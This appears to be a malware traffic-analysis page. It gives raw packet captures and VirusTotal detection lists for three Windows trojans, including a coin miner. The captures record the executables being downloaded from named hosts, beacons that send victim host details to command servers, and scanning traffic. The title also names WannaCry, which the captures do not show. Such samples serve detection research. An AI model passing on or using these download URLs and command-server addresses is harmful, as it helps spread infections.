2017-07-03 15:56:36.341164 IP 192.168.1.102.50642 > 77.12.57.8.6893: UDP, length 25
E..5)……….fM.9……!6.5d250b9731550098970000073
2017-07-03 15:56:36.341169 IP 192.168.1.102.50642 > 77.12.57.9.6893: UDP, length 25
E..5.5….._…fM.9    …..!6.5d250b9731550098970000073
2017-07-03 15:56:36.341216 IP 192.168.1.102.50642 > 77.12.57.10.6893: UDP, length 25
E..5>……….fM.9
…..!6.5d250b9731550098970000073
2017-07-03 15:56:36.341289 IP 192.168.1.102.50642 > 77.12.57.11.6893: UDP, length 25
E..5.^…..4…fM.9……!6.5d250b9731550098970000073
2017-07-03 15:56:36.341294 IP 192.168.1.102.50642 > 77.12.57.12.6893: UDP, length 25
E..5″x………fM.9……!6.5d250b9731550098970000073
2017-07-03 15:56:36.341372 IP 192.168.1.102.50642 > 77.12.57.13.6893: UDP, length 25
E..5………..fM.9……!6.5d250b9731550098970000073
2017-07-03 15:56:36.341423 IP 192.168.1.102.50642 > 77.12.57.14.6893: UDP, length 25
E..55!…..n…fM.9……!6.5d250b9731550098970000073
2017-07-03 15:56:36.341523 IP 192.168.1.102.50642 > 77.12.57.15.6893: UDP, length 25
E..5………..fM.9……!6.5d250b9731550098970000073
2017-07-03 15:56:36.341527 IP 192.168.1.102.50642 > 77.12.57.16.6893: UDP, length 25
E..5………..fM.9……!6.5d250b9731550098970000073
2017-07-03 15:56:36.341606 IP 192.168.1.102.50642 > 77.12.57.17.6893: UDP, length 25
E..5 -….._…fM.9……!6.5d250b9731550098970000073
2017-07-03 15:56:36.341610 IP 192.168.1.102.50642 > 77.12.57.18.6893: UDP, length 25
E..5………..fM.9……!6.5d250b9731550098970000073
2017-07-03 15:56:36.341701 IP 192.168.1.102.50642 > 77.12.57.19.6893: UDP, length 25
E..57v………fM.9……!6.5d250b9731550098970000073
2017-07-03 15:56:36.341705 IP 192.168.1.102.50642 > 77.12.57.20.6893: UDP, length 25
E..5.p………fM.9……!6.5d250b9731550098970000073
2017-07-03 15:56:36.341779 IP 192.168.1.102.50642 > 77.12.57.21.6893: UDP, length 25
E..5+……….fM.9……!6.5d250b9731550098970000073
2017-07-03 15:56:36.341829 IP 192.168.1.102.50642 > 77.12.57.22.6893: UDP, length 25
E..5.9…..N…fM.9……!6.5d250b9731550098970000073
2017-07-03 15:56:36.341833 IP 192.168.1.102.50642 > 77.12.57.23.6893: UDP, length 25
E..5<……….fM.9……!6.5d250b9731550098970000073
2017-07-03 15:56:36.341884 IP 192.168.1.102.50642 > 77.12.57.24.6893: UDP, length 25
E..5KT…..1…fM.9……!6.5d250b9731550098970000073
2017-07-03 15:56:36.341950 IP 192.168.1.102.50642 > 77.12.57.25.6893: UDP, length 25
E..5e……….fM.9……!6.5d250b9731550098970000073

2017-07-03 15:56:42.788139 IP 192.168.1.102.50643 > 87.98.176.53.6893: UDP, length 14
E..*R3………fWb.5……._5d250b973155ab….
2017-07-03 15:56:42.788228 IP 192.168.1.102.50643 > 87.98.176.54.6893: UDP, length 14
E..*x……g…fWb.6…….^5d250b973155ab….
2017-07-03 15:56:42.788391 IP 192.168.1.102.50643 > 87.98.176.55.6893: UDP, length 14
E..*^……c…fWb.7…….]5d250b973155ab….
2017-07-03 15:56:42.788441 IP 192.168.1.102.50643 > 87.98.176.56.6893: UDP, length 14
E..*1…..@….fWb.8…….\5d250b973155ab….
2017-07-03 15:56:42.788497 IP 192.168.1.102.50643 > 87.98.176.57.6893: UDP, length 14
E..*……jB…fWb.9…….[5d250b973155ab….
2017-07-03 15:56:42.788589 IP 192.168.1.102.50643 > 87.98.176.58.6893: UDP, length 14
E..*>X….3….fWb.:…….Z5d250b973155ab….
2017-07-03 15:56:42.788696 IP 192.168.1.102.50643 > 87.98.176.59.6893: UDP, length 14
E..*……X….fWb.;…….Y5d250b973155ab….
2017-07-03 15:56:42.788898 IP 192.168.1.102.50643 > 87.98.176.60.6893: UDP, length 14
E..*+…..F….fWb.<…….X5d250b973155ab….
2017-07-03 15:56:42.788973 IP 192.168.1.102.50643 > 87.98.176.61.6893: UDP, length 14
E..*.^….e….fWb.=…….W5d250b973155ab….
2017-07-03 15:56:42.789068 IP 192.168.1.102.50643 > 87.98.176.62.6893: UDP, length 14
E..*5…..<5…fWb.>…….V5d250b973155ab….
2017-07-03 15:56:42.789429 IP 192.168.1.102.50643 > 87.98.176.63.6893: UDP, length 14
E..*#…..Nv…fWb.?…….U5d250b973155ab….
2017-07-03 15:56:42.789620 IP 192.168.1.102.50643 > 87.98.176.64.6893: UDP, length 14
E..*……j5…fWb.@…….T5d250b973155ab….
2017-07-03 15:56:42.789738 IP 192.168.1.102.50643 > 87.98.176.65.6893: UDP, length 14
E..*1…..@n…fWb.A…….S5d250b973155ab….
2017-07-03 15:56:42.789935 IP 192.168.1.102.50643 > 87.98.176.66.6893: UDP, length 14
E..*.$….X….fWb.B…….R5d250b973155ab….
2017-07-03 15:56:42.789991 IP 192.168.1.102.50643 > 87.98.176.67.6893: UDP, length 14
E..*>`….3….fWb.C…….Q5d250b973155ab….
2017-07-03 15:56:42.789995 IP 192.168.1.102.50643 > 87.98.176.68.6893: UDP, length 14
E..*.f….e….fWb.D…….P5d250b973155ab….
2017-07-03 15:56:42.790091 IP 192.168.1.102.50643 > 87.98.176.69.6893: UDP, length 14
E..*+”….F….fWb.E…….O5d250b973155ab….
2017-07-03 15:56:42.790251 IP 192.168.1.102.50643 > 87.98.176.70.6893: UDP, length 14
E..*#…..Ni…fWb.F…….N5d250b973155ab….
2017-07-03 15:56:42.790311 IP 192.168.1.102.50643 > 87.98.176.71.6893: UDP, length 14
E..*5…..<“…fWb.G…….M5d250b973155ab….
2017-07-03 15:56:42.790363 IP 192.168.1.102.50643 > 87.98.176.72.6893: UDP, length 14
E..*J…..’….fWb.H…….L5d250b973155ab….
2017-2017-07-03 15:56:36.340777 IP 192.168.1.102.50642 > 77.12.57.0.6893: UDP, length 25
E..5l……….fM.9……!7.5d250b9731550098970000073

Nymeria Trojan Malware AURVIA.exe 213.183.58.9.1981 WannaCry SMB MS17-010 EternalBlue PCAP txt File Traffic Sample Download

SHA256: 61a28dba92fb1dc8bebec84115c934e1eb1b7643b49cf10667a943e819c811ae
File name: AURVIA.exe
Detection ratio: 45 / 61
Analysis date: 2017-07-03 20:28:12 UTC ( 0 minutes ago )
Ad-Aware AIT:Trojan.Nymeria.109 20170703
AegisLab Troj.W32.Autoit.lZhY 20170703
AhnLab-V3 Trojan/Win32.AutoIt.C2019675 20170703
ALYac AIT:Trojan.Nymeria.109 20170703
Arcabit AIT:Trojan.Nymeria.109 20170703
Avast Win32:Malware-gen 20170703
AVG Win32:Malware-gen 20170703
Avira (no cloud) TR/Worm.ztzxx 20170703
AVware Trojan.Win32.Generic!BT 20170703
BitDefender AIT:Trojan.Nymeria.109 20170703
CMC Trojan.Win32.Generic!O 20170701
Comodo TrojWare.Spy.Autoit.~ 20170703
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20170420
Cyren W32/Trojan.ULQS-9254 20170703
DrWeb Trojan.MulDrop7.31019 20170703
Emsisoft AIT:Trojan.Nymeria.109 (B) 20170703

 

2017-07-03 15:42:43.109898 IP 192.168.1.102.60633 > 176.9.21.114.80: Flags [P.], seq 0:407, ack 1, win 256, length 407: HTTP: GET /morgan/AURVIA.exe HTTP/1.1
E…>.@…3$…f.    .r…P.R..o…P…….GET /morgan/AURVIA.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: wearitgroups.com
Connection: Keep-Alive

2017-07-03 15:43:02.388661 IP 192.168.1.102.64250 > 75.75.75.75.53: 1813+ A? ip-score.com. (30)
E..:cP….~….fKKKK…5.&……………ip-score.com…..
2017-07-03 15:43:02.592822 IP 192.168.1.102.60634 > 95.211.125.236.80: Flags [S], seq 4247852493, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4″.@…8….f_.}….P.1…….. ……………..
2017-07-03 15:43:02.732962 IP 192.168.1.102.60634 > 95.211.125.236.80: Flags [.], ack 920389231, win 256, length 0
E..(“.@…8….f_.}….P.1..6..oP………….
2017-07-03 15:43:02.740348 IP 192.168.1.102.60634 > 95.211.125.236.80: Flags [P.], seq 0:66, ack 1, win 256, length 66: HTTP: GET /checkip/ HTTP/1.1
E..j”.@…7….f_.}….P.1..6..oP…{…GET /checkip/ HTTP/1.1
User-Agent: AutoIt
Host: ip-score.com

2017-07-03 15:43:03.150845 IP 192.168.1.102.60634 > 95.211.125.236.80: Flags [.], ack 7143, win 256, length 0
E..(“.@…8….f_.}….P.1..6.”UP….h……..
2017-07-03 15:43:03.152347 IP 192.168.1.102.60634 > 95.211.125.236.80: Flags [.], ack 10056, win 256, length 0
E..(“.@…8….f_.}….P.1..6.-.P………….
2017-07-03 15:43:03.699652 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [S], seq 3725019290, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4Q.@……..f..:    ……H……. .b……………
2017-07-03 15:43:06.704436 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [S], seq 3725019290, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4Q.@……..f..:    ……H……. .b……………
2017-07-03 15:43:07.063193 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 1238798603, win 260, length 0
E..(Q.@……..f..:    ……H.I…P………….
2017-07-03 15:43:07.065901 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [P.], seq 0:86, ack 1, win 260, length 86
E..~Q.@……..f..:    ……H.I…P…….United States|TTTTT3|76.111.8.85|blahhost|WIN_7|X86|No|No|1.0.1|ddd|Pr1080X21920X3|x|beta
2017-07-03 15:43:07.274722 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [P.], seq 0:86, ack 1, win 260, length 86
E..~Q.@……..f..:    ……H.I…P…….United States|TTTTT3|76.111.8.85|blahhost|WIN_7|X86|No|No|1.0.1|ddd|Pr1080X21920X3|x|beta
2017-07-03 15:43:11.664823 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 6, win 260, length 0
E..(Q.@……..f..:    ……H.I…P………….
2017-07-03 15:43:16.661934 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 11, win 260, length 0
E..(Q.@……..f..:    ……H.I…P………….
2017-07-03 15:43:21.674695 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 16, win 260, length 0
E..(Q.@……..f..:    ……H.I…P….~……..
2017-07-03 15:43:26.686897 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 21, win 260, length 0
E..(Q.@……..f..:    ……H.I…P….y……..
2017-07-03 15:43:30.683093 IP 192.168.1.102.137 > 192.168.1.112.137: NBT UDP PACKET(137): QUERY; POSITIVE; RESPONSE; UNICAST
E..fy…..<….f…p…..R…?………. FCFJDEFHEOCNFAEDCACACACACACACACA.. ……..`…..`…..`….f
2017-07-03 15:43:30.686265 IP 192.168.1.102.5355 > 192.168.1.112.59508: UDP, length 50
E..Ny…..<….f…p…t.:.I………….blahhost-PC……blahhost-PC…………..f
2017-07-03 15:43:30.686353 IP 192.168.1.102.5355 > 192.168.1.112.50550: UDP, length 62
E..Zy…..<….f…p…v.F|…………..blahhost-PC……blahhost-PC……………………..&
2017-07-03 15:43:30.694290 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [S.], seq 714103385, ack 3128129811, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4y.@……..f…p…S*.ZY.sy… .B……………
2017-07-03 15:43:30.701319 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [P.], seq 1:5, ack 73, win 256, length 4 NBT Session Packet: Session Granted
E..,y.@……..f…p…S*.ZZ.sy[P…     ……..
2017-07-03 15:43:30.703165 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [P.], seq 5:414, ack 210, win 256, length 409 NBT Session Packet: Session Message
E…y.@….Q…f…p…S*.Z^.sy.P…kg…….SMBr…..C…………………….
………………….L4……P..%…..O…
.l!.`..<..+……..00..,..0..
+…..7….
+…..7..
……..NEGOEXTS……..`…p……..:..).4.V..n…z…P…..G….=.t{…N…$.?……..`……………\3S….M..J.xn..NEGOEXTS……..@…………:..).4.V..n\3S….M..J.xn..@…X…0V.T0R0′.%0#1!0…U….Token Signing Public Key0′.%0#1!0…U….Token Signing Public Key
2017-07-03 15:43:30.705940 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [P.], seq 414:744, ack 352, win 255, length 330 NBT Session Packet: Session Message
E..ry.@……..f…p…S*.[..szrP….X…..F.SMBs…………………………F……….0….
…..
+…..7..
……NTLMSSP………8…….ij.9$.H………`.`.H…
.98….R.Y.4.W.N.-.P.C…..R.Y.4.W.N.-.P.C…..R.Y.4.W.N.-.P.C…..r.y.4.w.n.-.P.C…..r.y.4.w.n.-.P.C……..L4…….W.i.n.d.o.w.s. .1.0. .H.o.m.e. .1.4.3.9.3…W.i.n.d.o.w.s. .1.0. .H.o.m.e. .6…3…
2017-07-03 15:43:30.709358 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [P.], seq 744:904, ack 592, win 254, length 160 NBT Session Packet: Session Message
E…y.@….H…f…p…S*.]A.s{bP…………SMBs……………………. ……….q…0…
…………d….;….W.i.n.d.o.w.s. .1.0. .H.o.m.e. .1.4.3.9.3…W.i.n.d.o.w.s. .1.0. .H.o.m.e. .6…3…
2017-07-03 15:43:30.712507 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [P.], seq 904:964, ack 678, win 254, length 60 NBT Session Packet: Session Message
E..dy.@……..f…p…S*.]..s{.P…H……8.SMBu…………………….0….8………….IPC….
2017-07-03 15:43:30.718820 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [P.], seq 964:1086, ack 800, win 253, length 122 NBT Session Packet: Session Message
E…y.@….l…f…p…S*.^..s|2P…t<…..v.SMB%…………………H…@.
..6…..8…6.@…..?……….DESKTOP-H25VU4V.
…..4…blahhost-PC……..
…..5…..
2017-07-03 15:43:30.721043 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [P.], seq 1086:1189, ack 922, win 253, length 103 NBT Session Packet: Session Message
E…y.@….~…f…p…S*.^..s|.P……….c.SMB%…………………H…P.
..#…..8…#.@…..,……….WORKGROUP……..
……..blahhost-PC.
2017-07-03 15:43:31.699415 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 26, win 260, length 0
E..(Q.@……..f..:    ……H.I..$P….t……..
2017-07-03 15:43:36.711794 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 31, win 260, length 0
E..(Q.@……..f..:    ……H.I..)P….o……..
2017-07-03 15:43:41.376732 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [P.], seq 1189:1228, ack 961, win 253, length 39 NBT Session Packet: Session Message
E..Oy.@……..f…p…S*.^..s|.P…s……#.SMBq…………………….`….
2017-07-03 15:43:41.378025 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [P.], seq 1228:1271, ack 1004, win 253, length 43 NBT Session Packet: Session Message
E..Sy.@……..f…p…S*._%.s|.P…Y……’.SMBt………………..-….p….’…
2017-07-03 15:43:41.381702 IP 192.168.1.102.139 > 192.168.1.112.53075: Flags [F.], seq 1271, ack 1005, win 253, length 0
E..(y.@……..f…p…S*._P.s|.P….}……..
2017-07-03 15:43:41.724493 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 36, win 260, length 0
E..(Q.@……..f..:    ……H.I…P….j……..
2017-07-03 15:43:46.736953 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 41, win 260, length 0
E..(Q.@……..f..:    ……H.I..3P….e……..
2017-07-03 15:43:51.365090 IP 192.168.1.102.55851 > 75.75.75.75.53: 55467+ A? win10.ipv6.microsoft.com. (42)
E..FcQ….~….fKKKK.+.5.2……………win10.ipv6    microsoft.com…..
2017-07-03 15:43:51.727215 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 46, win 260, length 0
E..(Q.@……..f..:    ……H.I..8P….`……..
2017-07-03 15:43:56.740004 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 51, win 260, length 0
E..(Q @……..f..:    ……H.I..=P….[……..
2017-07-03 15:44:01.752644 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 56, win 260, length 0
E..(Q!@……..f..:    ……H.I..BP….V……..
2017-07-03 15:44:06.765073 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 61, win 260, length 0
E..(Q”@……..f..:    ……H.I..GP….Q……..
2017-07-03 15:44:08.152155 IP 192.168.1.102.60634 > 95.211.125.236.80: Flags [.], ack 10057, win 256, length 0
E..(“.@…8….f_.}….P.1..6.-.P………….
2017-07-03 15:44:11.780588 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 66, win 260, length 0
E..(Q#@……..f..:    ……H.I..LP….L……..
2017-07-03 15:44:16.793072 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 71, win 260, length 0
E..(Q$@……..f..:    ……H.I..QP….G……..
2017-07-03 15:44:21.805533 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 76, win 260, length 0
E..(Q%@……..f..:    ……H.I..VP….B……..
2017-07-03 15:44:26.802501 IP 192.168.1.102.60635 > 213.183.58.9.1981: Flags [.], ack 81, win 259, length 0
E..(Q&@……..f..:    ……H.I..[P….>……..

 

CoinMiner app.exe Malware IRC Backdoor Trojan Botnet PCAP File Download Traffic Analysis Sample

SHA256: 8d670eaeecbe0d8bc172560646b86d729b2c80b2f536cd2024a8ae502d89c805
File name: app.exe
Detection ratio: 44 / 61
Analysis date: 2017-07-03 22:06:14 UTC ( 0 minutes ago )

 

Ikarus Trojan.MSIL.CoinMiner 20170703
K7AntiVirus Trojan ( 005104711 ) 20170703
K7GW Trojan ( 005104711 ) 20170703
Kaspersky Trojan.Win32.CoinMiner.qtq 20170703
Malwarebytes Backdoor.Bot 20170703
McAfee RDN/Generic.grp 20170703
McAfee-GW-Edition RDN/Generic.grp 20170703
Microsoft Trojan:Win32/Skeeyah.A!bit 20170703
eScan Gen:Variant.MSILPerseus.107893 20170703
NANO-Antivirus Trojan.Win32.CoinMiner.eqojuk 20170703
Palo Alto Networks (Known Signatures) generic.ml 20170703
Panda Trj/CI.A 20170703
Rising Trojan.CoinMiner!8.30A (cloud:bDpaAd9U5ZE) 20170703
SentinelOne (Static ML) static engine – malicious 20170516
Sophos Mal/Generic-S 20170703
Symantec Trojan.Gen.2 20170703
Tencent Win32.Trojan.Coinminer.Pegd 20170703
TrendMicro TROJ_GEN.R0E9C0PG317 20170703
TrendMicro-HouseCall TROJ_GEN.R0E9C0PG317 20170703
VIPRE Trojan.Win32.Generic!BT 20170703

https://virustotal.com/en/file/8d670eaeecbe0d8bc172560646b86d729b2c80b2f536cd2024a8ae502d89c805/analysis/1499119574/

 

 

2017-07-03 15:39:29.122784 IP 192.168.1.102.60543 > 87.236.19.98.80: Flags [P.], seq 0:408, ack 1, win 64240, length 408: HTTP: GET /holyson/app.exe HTTP/1.1
E….j@….q…fW..b…P.c……P…….GET /holyson/app.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: gatsoed9.beget.tech
Connection: Keep-Alive

2017-07-03 15:39:37.174504 IP 192.168.1.102.51863 > 75.75.75.75.53: 20019+ A? iplogger.com. (30)
E..:c2….~….fKKKK…5.&..N3………..iplogger.com…..
2017-07-03 15:39:37.175522 IP 192.168.1.102.51864 > 75.75.75.75.53: 33057+ A? gatsoed9.beget.tech. (37)
E..Ac3….~….fKKKK…5.-…!………..gatsoed9.beget.tech…..
2017-07-03 15:39:37.485660 IP 192.168.1.102.60544 > 87.236.19.98.80: Flags [S], seq 808192539, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.s@……..fW..b…P0,
……. ……………..
2017-07-03 15:39:37.643513 IP 192.168.1.102.60544 > 87.236.19.98.80: Flags [.], ack 4015261327, win 64240, length 0
E..(.t@……..fW..b…P0,
..T..P…j………
2017-07-03 15:39:37.646816 IP 192.168.1.102.60544 > 87.236.19.98.80: Flags [P.], seq 0:80, ack 1, win 64240, length 80: HTTP: GET /AudioHD.exe HTTP/1.1
E..x.u@……..fW..b…P0,
..T..P…….GET /AudioHD.exe HTTP/1.1
Host: gatsoed9.beget.tech
Connection: Keep-Alive

 

2017-07-03 15:40:40.051841 IP 192.168.1.102.60545 > 88.99.66.31.443: Flags [.], ack 6604, win 253, length 0
E..(..@….?…fXcB…..|….<..P…h………
2017-07-03 15:40:54.728442 IP 192.168.1.102.60544 > 87.236.19.98.80: Flags [.], ack 1497873, win 64240, length 0
E..(.B@….1…fW..b…P0,
l.j..P………….
2017-07-03 15:40:56.480813 IP 192.168.1.102.60533 > 212.129.46.191.6666: Flags [.], ack 2319946782, win 252, length 0
E..(..@…0….f…..u.

Razy Trojan Malware oylau2003.ddns.net PCAP File download traffic sample

SHA256: 5e123d4f7b03118196a1f27cfa5a56a3ca8723c3d0e5b02d3719459ab303221b
File name: 7c8701febd.exe
Detection ratio: 42 / 61
Analysis date: 2017-07-03 22:01:16 UTC ( 0 minutes ago )
Ad-Aware Gen:Variant.Razy.6869 20170703
AegisLab Troj.W32.Gen.mein 20170703
AhnLab-V3 Trojan/Win32.Agent.R202451 20170703
ALYac Gen:Variant.Razy.6869 20170703
Arcabit Trojan.Razy.D1AD5 20170703
Avast Win32:Evo-gen [Susp] 20170703
AVG Win32:Evo-gen [Susp] 20170703
Avira (no cloud) TR/Dropper.Gen 20170703
AVware Trojan.Win32.Generic!BT 20170703
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9999 20170703
BitDefender Gen:Variant.Razy.6869 20170703

 

2017-07-03 15:25:01.264665 IP 192.168.1.102.60223 > 107.154.161.190.80: Flags [P.], seq 0:410, ack 1, win 256, length 410: HTTP: GET /download/7c8701febd.exe HTTP/1.1
E…LY@….u…fk….?.PV..ax…P…S3..GET /download/7c8701febd.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: directlink.cz
Connection: Keep-Alive

 

2017-07-03 15:26:42.312240 IP 192.168.1.102.60499 > 75.75.75.75.53: 51646+ A? oylau2003.ddns.net. (36)
E..@b……….fKKKK.S.5.,…………..        oylau2003.ddns.net…..
2017-07-03 15:26:42.332629 IP 192.168.1.102.60253 > 103.68.223.134.3232: Flags [S], seq 123003361, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4!.@….B…fgD…]…T…….. .e……………